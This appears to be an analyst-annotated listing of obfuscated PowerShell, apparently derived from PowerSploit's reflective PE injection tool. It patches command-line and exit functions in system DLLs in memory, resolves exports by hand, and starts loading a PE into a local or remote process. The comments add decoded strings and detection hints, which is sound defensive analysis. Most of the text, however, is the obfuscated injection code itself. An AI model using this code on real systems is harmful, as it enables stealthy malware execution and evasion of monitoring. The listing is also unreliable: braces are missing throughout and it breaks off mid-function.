${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${01110001011001101}, ${10001110000011011}, ${11000001100000010}, [Ref]${00100111001001011})
if (${01100111110111001} -eq $false)
# decodes to: "Unable to change memory protection"
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGgAYQBuAGcAZQAgAG0AZQBtAG8AcgB5ACAAcAByAG8AdABlAGMAdABpAG8AbgA=')))
# Patches process-wide API entry points inside the current process and returns a list
# of (patched address, saved original bytes, length) triples for later restoration.
#   ${_00110100101000100} - PE info object (not read in the visible body).
#   $Win32Functions       - object exposing GetModuleHandle, GetProcAddress, VirtualProtect, memcpy.
#   $Win32Constants       - constants object; PAGE_EXECUTE_READWRITE is read from it.
#   ${_10110001000000101} - string that the patched command-line getters will hand out.
#   ${_10111110001100110} - pointer embedded into the exit-function stubs.
# What the visible code does, in order:
#   1. Overwrites the start of GetCommandLineA / GetCommandLineW (resolved from KernelBase.dll)
#      with a short stub that carries a pointer to an ANSI / Unicode copy of the string.
#   2. For any loaded msvcr*.dll from a fixed list, overwrites the _acmdln / _wcmdln pointers.
#   3. Overwrites the start of CorExitProcess (mscoree.dll) and ExitProcess (Kernel32.dll)
#      with a stub that embeds ${_10111110001100110} and the address of ExitThread.
# All API and DLL names are stored as UTF-16LE base64 literals; the decoded values are
# given in the comments below and are usable as static-detection strings.
# NOTE(review): braces are missing in this listing, so block boundaries (if / foreach
# bodies) are inferred from statement order - confirm against an intact copy.
# NOTE(review): the parameter names and the decoded label strings match PowerSploit's
# Invoke-ReflectivePEInjection helper of the same shape - presumably derived from it; confirm.
# Analyst note: this is in-memory modification of system DLL code pages from a PowerShell
# host. Telemetry to look at: PowerShell script block logging (event 4104) containing
# these literals, and code-integrity / memory scans comparing kernelbase, kernel32 and
# mscoree export prologues in the live process against the on-disk image.
Function _00001000001100111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants,
[Parameter(Position = 3, Mandatory = $true)]
[String]
${_10110001000000101},
[Parameter(Position = 4, Mandatory = $true)]
[IntPtr]
${_10111110001100110}
# Restore list that is eventually returned to the caller.
${10100010011001001} = @()
# Pointer size of the current process: 8 on 64-bit, 4 on 32-bit.
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
[UInt32]${00100111001001011} = 0
# Literal decodes to "Kernel32.dll".
[IntPtr]${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
if (${01100100100000111} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAMwAyACAAaABhAG4AZABsAGUAIABuAHUAbABsAA==')))
# Literal decodes to "KernelBase.dll".
[IntPtr]${01010111100101000} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAQgBhAHMAZQAuAGQAbABsAA=='))))
if (${01010111100101000} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SwBlAHIAbgBlAGwAQgBhAHMAZQAgAGgAYQBuAGQAbABlACAAbgB1AGwAbAA=')))
# Unmanaged Unicode and ANSI copies of the replacement command line. No matching
# FreeHGlobal is visible in this function.
${10101101111001110} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(${_10110001000000101})
${00110011010001101} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi(${_10110001000000101})
# Literals decode to "GetCommandLineA" and "GetCommandLineW", both resolved from KernelBase.dll.
[IntPtr]${00101000101010001} = $Win32Functions.GetProcAddress.Invoke(${01010111100101000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAEEA'))))
[IntPtr]${01010100011111101} = $Win32Functions.GetProcAddress.Invoke(${01010111100101000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAFcA'))))
if (${00101000101010001} -eq [IntPtr]::Zero -or ${01010100011111101} -eq [IntPtr]::Zero)
throw "GetCommandLine ptr null. GetCommandLineA: $(_00100010111110111 ${00101000101010001}). GetCommandLineW: $(_00100010111110111 ${01010100011111101})"
# Stub layout: prefix bytes (0x48 added only when pointers are 8 bytes, then 0xb8),
# a pointer-sized value, and a trailing 0xc3.
[Byte[]]${01101010111000110} = @()
if (${01001001001010110} -eq 8)
${01101010111000110} += 0x48
${01101010111000110} += 0xb8
[Byte[]]${00110011011111101} = @(0xc3)
${10000111101000001} = ${01101010111000110}.Length + ${01001001001010110} + ${00110011011111101}.Length
# Save the original bytes of both functions before they are overwritten.
${10010010011101001} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10000111101000001})
${00000010110110101} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10000111101000001})
$Win32Functions.memcpy.Invoke(${10010010011101001}, ${00101000101010001}, [UInt64]${10000111101000001}) | Out-Null
$Win32Functions.memcpy.Invoke(${00000010110110101}, ${01010100011111101}, [UInt64]${10000111101000001}) | Out-Null
${10100010011001001} += ,(${00101000101010001}, ${10010010011101001}, ${10000111101000001})
${10100010011001001} += ,(${01010100011111101}, ${00000010110110101}, ${10000111101000001})
[UInt32]${00100111001001011} = 0
# Make the GetCommandLineA prologue writable (PAGE_EXECUTE_READWRITE); old protection is captured by reference.
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${00101000101010001}, [UInt32]${10000111101000001}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
# NOTE(review): `=` is assignment, not comparison; the condition always evaluates to
# $false, so a failed VirtualProtect is not detected here. Same pattern at the other
# `= $false` tests in this function.
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
# Write prefix, pointer to the ANSI string, and trailer at the function start,
# then put the previous protection back.
${10111001011001001} = ${00101000101010001}
_01011110000000101 -_00101110110110110 ${01101010111000110} -_10010100011101100 ${10111001011001001}
${10111001011001001} = _01101001110001101 ${10111001011001001} (${01101010111000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00110011010001101}, ${10111001011001001}, $false)
${10111001011001001} = _01101001110001101 ${10111001011001001} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00110011011111101} -_10010100011101100 ${10111001011001001}
$Win32Functions.VirtualProtect.Invoke(${00101000101010001}, [UInt32]${10000111101000001}, [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
# Same sequence for GetCommandLineW, using the Unicode copy of the string.
[UInt32]${00100111001001011} = 0
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${01010100011111101}, [UInt32]${10000111101000001}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
${01011101101001000} = ${01010100011111101}
_01011110000000101 -_00101110110110110 ${01101010111000110} -_10010100011101100 ${01011101101001000}
${01011101101001000} = _01101001110001101 ${01011101101001000} (${01101010111000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10101101111001110}, ${01011101101001000}, $false)
${01011101101001000} = _01101001110001101 ${01011101101001000} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00110011011111101} -_10010100011101100 ${01011101101001000}
$Win32Functions.VirtualProtect.Invoke(${01010100011111101}, [UInt32]${10000111101000001}, [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
# C runtime DLL names checked next; the literals decode to msvcr70d/71d/80d/90d/100d/110d.dll
# and msvcr70/71/80/90/100/110.dll.
${01111011011011001} = @($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMABkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMQBkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADgAMABkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADkAMABkAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMAAwAGQALgBkAGwAbAA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMQAwAGQALgBkAGwAbAA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMAAuAGQAbABsAA=='))) `
, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADcAMQAuAGQAbABsAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADgAMAAuAGQAbABsAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADkAMAAuAGQAbABsAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMAAwAC4AZABsAGwA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAHYAYwByADEAMQAwAC4AZABsAGwA'))))
foreach (${10010000000000110} in ${01111011011011001})
# Only DLLs already loaded in the process are touched (GetModuleHandle does not load).
[IntPtr]${00000000011101111} = $Win32Functions.GetModuleHandle.Invoke(${10010000000000110})
if (${00000000011101111} -ne [IntPtr]::Zero)
# Literals decode to "_wcmdln" and "_acmdln".
[IntPtr]${10001111001001010} = $Win32Functions.GetProcAddress.Invoke(${00000000011101111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XwB3AGMAbQBkAGwAbgA='))))
[IntPtr]${10011111110000111} = $Win32Functions.GetProcAddress.Invoke(${00000000011101111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XwBhAGMAbQBkAGwAbgA='))))
if (${10001111001001010} -eq [IntPtr]::Zero -or ${10011111110000111} -eq [IntPtr]::Zero)
# NOTE(review): bare string expression (decodes to "Error, couldn't find _wcmdln or _acmdln");
# it is emitted to the output stream rather than thrown, so execution continues.
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQByAHIAbwByACwAIABjAG8AdQBsAGQAbgAnAHQAIABmAGkAbgBkACAAXwB3AGMAbQBkAGwAbgAgAG8AcgAgAF8AYQBjAG0AZABsAG4A')))
${10100110101111000} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi(${_10110001000000101})
${00000111001001111} = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(${_10110001000000101})
# Read the current pointer values and keep copies for the restore list.
${10110101111111001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10011111110000111}, [Type][IntPtr])
${10110011011000001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10001111001001010}, [Type][IntPtr])
${01011111010110101} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
${00111100100010111} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${01001001001010110})
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10110101111111001}, ${01011111010110101}, $false)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10110011011000001}, ${00111100100010111}, $false)
${10100010011001001} += ,(${10011111110000111}, ${01011111010110101}, ${01001001001010110})
${10100010011001001} += ,(${10001111001001010}, ${00111100100010111}, ${01001001001010110})
# Replace _acmdln with the pointer to the ANSI string, then restore protection.
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${10011111110000111}, [UInt32]${01001001001010110}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${10100110101111000}, ${10011111110000111}, $false)
$Win32Functions.VirtualProtect.Invoke(${10011111110000111}, [UInt32]${01001001001010110}, [UInt32](${00100111001001011}), [Ref]${00100111001001011}) | Out-Null
# Replace _wcmdln with the pointer to the Unicode string, then restore protection.
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${10001111001001010}, [UInt32]${01001001001010110}, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]${00100111001001011})
if (${01100111110111001} = $false)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${00000111001001111}, ${10001111001001010}, $false)
$Win32Functions.VirtualProtect.Invoke(${10001111001001010}, [UInt32]${01001001001010110}, [UInt32](${00100111001001011}), [Ref]${00100111001001011}) | Out-Null
# NOTE(review): the restore list is reassigned to an empty array here, which drops the
# command-line entries recorded above; only the exit-function patches below are returned.
# Forensic consequence: the GetCommandLine / _acmdln / _wcmdln changes have no restore record.
${10100010011001001} = @()
# Addresses of the exit functions that get overwritten.
${01111110000011010} = @()
# Literal decodes to "mscoree.dll".
[IntPtr]${10100001101010010} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAGMAbwByAGUAZQAuAGQAbABsAA=='))))
if (${10100001101010010} -eq [IntPtr]::Zero)
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBzAGMAbwByAGUAZQAgAGgAYQBuAGQAbABlACAAbgB1AGwAbAA=')))
# Literal decodes to "CorExitProcess".
[IntPtr]${10000101101101110} = $Win32Functions.GetProcAddress.Invoke(${10100001101010010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHIARQB4AGkAdABQAHIAbwBjAGUAcwBzAA=='))))
if (${10000101101101110} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHIARQB4AGkAdABQAHIAbwBjAGUAcwBzACAAYQBkAGQAcgBlAHMAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAA==')))
${01111110000011010} += ${10000101101101110}
# Literal decodes to "ExitProcess", resolved from the Kernel32.dll handle obtained above.
[IntPtr]${10001011111110101} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABQAHIAbwBjAGUAcwBzAA=='))))
if (${10001011111110101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABQAHIAbwBjAGUAcwBzACAAYQBkAGQAcgBlAHMAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAA==')))
${01111110000011010} += ${10001011111110101}
[UInt32]${00100111001001011} = 0
foreach (${10001100100010000} in ${01111110000011010})
# Write cursor that advances through the function prologue being replaced.
${00111101000001010} = ${10001100100010000}
# Stub pieces for a 4-byte pointer size; replaced just below when pointers are 8 bytes.
[Byte[]]${01101010111000110} = @(0xbb)
[Byte[]]${00110011011111101} = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
if (${01001001001010110} -eq 8)
[Byte[]]${01101010111000110} = @(0x48, 0xbb)
[Byte[]]${00110011011111101} = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
[Byte[]]${00100010001111001} = @(0xff, 0xd3)
# Total stub size: piece 1 + pointer + piece 2 + pointer + piece 3.
${10000111101000001} = ${01101010111000110}.Length + ${01001001001010110} + ${00110011011111101}.Length + ${01001001001010110} + ${00100010001111001}.Length
# Literal decodes to "ExitThread", resolved from Kernel32.dll.
[IntPtr]${01010001110101101} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABUAGgAcgBlAGEAZAA='))))
if (${01010001110101101} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGkAdABUAGgAcgBlAGEAZAAgAGEAZABkAHIAZQBzAHMAIABuAG8AdAAgAGYAbwB1AG4AZAA=')))
# Unlike the earlier checks, this one uses -eq, so a VirtualProtect failure is caught.
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${10001100100010000}, [UInt32]${10000111101000001}, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]${00100111001001011})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
# Keep the original prologue bytes so the caller can put them back later.
${01000111100010100} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10000111101000001})
$Win32Functions.memcpy.Invoke(${01000111100010100}, ${10001100100010000}, [UInt64]${10000111101000001}) | Out-Null
${10100010011001001} += ,(${10001100100010000}, ${01000111100010100}, ${10000111101000001})
# Stub is written as: piece 1, the caller-supplied pointer ${_10111110001100110},
# piece 2, the ExitThread address, piece 3.
_01011110000000101 -_00101110110110110 ${01101010111000110} -_10010100011101100 ${00111101000001010}
${00111101000001010} = _01101001110001101 ${00111101000001010} (${01101010111000110}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${_10111110001100110}, ${00111101000001010}, $false)
${00111101000001010} = _01101001110001101 ${00111101000001010} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00110011011111101} -_10010100011101100 ${00111101000001010}
${00111101000001010} = _01101001110001101 ${00111101000001010} (${00110011011111101}.Length)
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${01010001110101101}, ${00111101000001010}, $false)
${00111101000001010} = _01101001110001101 ${00111101000001010} ${01001001001010110}
_01011110000000101 -_00101110110110110 ${00100010001111001} -_10010100011101100 ${00111101000001010}
# Put the previous page protection back on the patched function.
$Win32Functions.VirtualProtect.Invoke(${10001100100010000}, [UInt32]${10000111101000001}, [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
# Emits the restore list as the function's output.
echo ${10100010011001001}
# Copies saved bytes back over previously modified memory locations.
#   ${_00010001100101000} - array of entries; each entry is indexed as
#                           [0] destination address, [1] source buffer, [2] byte count.
#   $Win32Functions       - object exposing VirtualProtect and memcpy as invokable delegates.
#   $Win32Constants       - constants object; PAGE_EXECUTE_READWRITE is read from it.
# Throws when the first VirtualProtect of an entry returns $false; the message
# decodes (UTF-16LE base64) to "Call to VirtualProtect failed".
# NOTE(review): braces are missing in this listing; the statements after `foreach`
# are presumably the loop body - confirm against an intact copy.
# Analyst note: after this runs, the patched locations no longer differ from the
# on-disk image, so a memory-integrity comparison has to be taken before this point.
# The source buffers in [1] are not freed in the visible code.
Function _01000010000010111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Array[]]
${_00010001100101000},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Constants
# Receives the previous protection so it can be reinstated after the copy.
[UInt32]${00100111001001011} = 0
foreach (${01000101101110001} in ${_00010001100101000})
# Make the destination writable.
${01100111110111001} = $Win32Functions.VirtualProtect.Invoke(${01000101101110001}[0], [UInt32]${01000101101110001}[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]${00100111001001011})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAgAGYAYQBpAGwAZQBkAA==')))
# Copy the saved bytes back, then restore the protection captured above.
$Win32Functions.memcpy.Invoke(${01000101101110001}[0], ${01000101101110001}[1], [UInt64]${01000101101110001}[2]) | Out-Null
# The result of this second VirtualProtect is discarded, so a failure here is silent.
$Win32Functions.VirtualProtect.Invoke(${01000101101110001}[0], [UInt32]${01000101101110001}[2], [UInt32]${00100111001001011}, [Ref]${00100111001001011}) | Out-Null
# Resolves an exported function by name from a PE image that is already mapped in
# memory, by reading the image's export directory directly.
#   ${_10111111000001111} - base address of the mapped image.
#   ${_10100010000010100} - export name to look up (compared case-sensitively with -ceq).
#   Returns: base + function RVA on a match; [IntPtr]::Zero when the export table
#            size is 0 or no name matches.
# NOTE(review): braces are missing in this listing, so the loop and `if` bodies are
# inferred from statement order - confirm against an intact copy.
# Analyst note: no GetProcAddress call is made here, so API-call monitoring of
# GetProcAddress does not observe this lookup. NumberOfNames and the Address* RVAs
# are read from the image itself, with no bounds checks visible in this function.
Function _00000001101011101
Param(
[Parameter(Position = 0, Mandatory = $true)]
[IntPtr]
${_10111111000001111},
[Parameter(Position = 1, Mandatory = $true)]
[String]
${_10100010000010100}
# Helper objects built by functions defined elsewhere in the file.
$Win32Types = _10100111101101101
$Win32Constants = _10101001111100001
# Parsed header information for the image at the given base address.
${_00110100101000100} = _00011000111100111 -_10111111000001111 ${_10111111000001111} -Win32Types $Win32Types -Win32Constants $Win32Constants
# No export table present: nothing to resolve.
if (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
return [IntPtr]::Zero
# Export directory = base + ExportTable.VirtualAddress.
# _01101001110001101 is used throughout as pointer-plus-offset addition (defined outside this view).
${10010100000000010} = _01101001110001101 (${_10111111000001111}) (${_00110100101000100}.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
${10100100000000010} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10010100000000010}, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
for (${01101000000100101} = 0; ${01101000000100101} -lt ${10100100000000010}.NumberOfNames; ${01101000000100101}++)
# i-th entry of the name table (UInt32 RVAs), dereferenced to an ANSI string.
${01000101110001001} = _01101001110001101 (${_10111111000001111}) (${10100100000000010}.AddressOfNames + (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
${10100001000010100} = _01101001110001101 (${_10111111000001111}) ([System.Runtime.InteropServices.Marshal]::PtrToStructure(${01000101110001001}, [Type][UInt32]))
${01001010001100110} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${10100001000010100})
if (${01001010001100110} -ceq ${_10100010000010100})
# Name index -> ordinal (UInt16 table) -> function RVA (UInt32 table).
${01011100011010100} = _01101001110001101 (${_10111111000001111}) (${10100100000000010}.AddressOfNameOrdinals + (${01101000000100101} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
${01101010001110001} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${01011100011010100}, [Type][UInt16])
${00110010111101111} = _01101001110001101 (${_10111111000001111}) (${10100100000000010}.AddressOfFunctions + (${01101010001110001} * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
${10100011011001011} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00110010111101111}, [Type][UInt32])
return _01101001110001101 (${_10111111000001111}) (${10100011011001011})
# Falls through to here when no exported name matched.
return [IntPtr]::Zero
Function _00111010101101100
Param(
[Parameter( Position = 0, Mandatory = $true )]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $false)]
[String]
${_01011011000001101},
[Parameter(Position = 2, Mandatory = $false)]
[IntPtr]
${_10010001100101011},
[Parameter(Position = 3)]
[Bool]
${_00100110100011000} = $false
${01001001001010110} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
$Win32Constants = _10101001111100001
$Win32Functions = _01011100100111011
$Win32Types = _10100111101101101
${01101001000001101} = $false
if ((${_10010001100101011} -ne $null) -and (${_10010001100101011} -ne [IntPtr]::Zero))
${01101001000001101} = $true
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAdABpAG4AZwAgAGIAYQBzAGkAYwAgAFAARQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAGYAcgBvAG0AIAB0AGgAZQAgAGYAaQBsAGUA')))
${_00110100101000100} = _01110011101110110 -_00000000110100000 ${_00000000110100000} -Win32Types $Win32Types
${_10110001101101110} = ${_00110100101000100}.OriginalImageBase
${10111101111001110} = $true
if (([Int] ${_00110100101000100}.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAaQBzACAAbgBvAHQAIABjAG8AbQBwAGEAdABpAGIAbABlACAAdwBpAHQAaAAgAEQARQBQACwAIABtAGkAZwBoAHQAIABjAGEAdQBzAGUAIABpAHMAcwB1AGUAcwA='))) -WarningAction Continue
${10111101111001110} = $false
${01011110010011000} = $true
if (${01101001000001101} -eq $true)
${01100100100000111} = $Win32Functions.GetModuleHandle.Invoke($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))))
${01111011110110011} = $Win32Functions.GetProcAddress.Invoke(${01100100100000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBzAFcAbwB3ADYANABQAHIAbwBjAGUAcwBzAA=='))))
if (${01111011110110011} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAbABvAGMAYQB0AGUAIABJAHMAVwBvAHcANgA0AFAAcgBvAGMAZQBzAHMAIABmAHUAbgBjAHQAaQBvAG4AIAB0AG8AIABkAGUAdABlAHIAbQBpAG4AZQAgAGkAZgAgAHQAYQByAGcAZQB0ACAAcAByAG8AYwBlAHMAcwAgAGkAcwAgADMAMgBiAGkAdAAgAG8AcgAgADYANABiAGkAdAA=')))
[Bool]${00010100100111100} = $false
${01100111110111001} = $Win32Functions.IsWow64Process.Invoke(${_10010001100101011}, [Ref]${00010100100111100})
if (${01100111110111001} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbAAgAHQAbwAgAEkAcwBXAG8AdwA2ADQAUAByAG8AYwBlAHMAcwAgAGYAYQBpAGwAZQBkAA==')))
if ((${00010100100111100} -eq $true) -or ((${00010100100111100} -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
${01011110010011000} = $false
${00000101100111010} = $true
if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
${00000101100111010} = $false
if (${00000101100111010} -ne ${01011110010011000})
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAaABlAGwAbAAgAG0AdQBzAHQAIABiAGUAIABzAGEAbQBlACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUAIAAoAHgAOAA2AC8AeAA2ADQAKQAgAGEAcwAgAFAARQAgAGIAZQBpAG4AZwAgAGwAbwBhAGQAZQBkACAAYQBuAGQAIAByAGUAbQBvAHQAZQAgAHAAcgBvAGMAZQBzAHMA')))
if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
${01011110010011000} = $false
if (${01011110010011000} -ne ${_00110100101000100}.PE64Bit)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAcABsAGEAdABmAG8AcgBtACAAZABvAGUAcwBuACcAdAAgAG0AYQB0AGMAaAAgAHQAaABlACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUAIABvAGYAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIABpAHQAIABpAHMAIABiAGUAaQBuAGcAIABsAG8AYQBkAGUAZAAgAGkAbgAgACgAMwAyAC8ANgA0AGIAaQB0ACkA')))
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBsAGwAbwBjAGEAdABpAG4AZwAgAG0AZQBtAG8AcgB5ACAAZgBvAHIAIAB0AGgAZQAgAFAARQAgAGEAbgBkACAAdwByAGkAdABlACAAaQB0AHMAIABoAGUAYQBkAGUAcgBzACAAdABvACAAbQBlAG0AbwByAHkA')))
[IntPtr]${00111111000110001} = [IntPtr]::Zero
${00110100101001110} = ([Int] ${_00110100101000100}.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
if ((-not ${_00100110100011000}) -and (-not ${00110100101001110}))
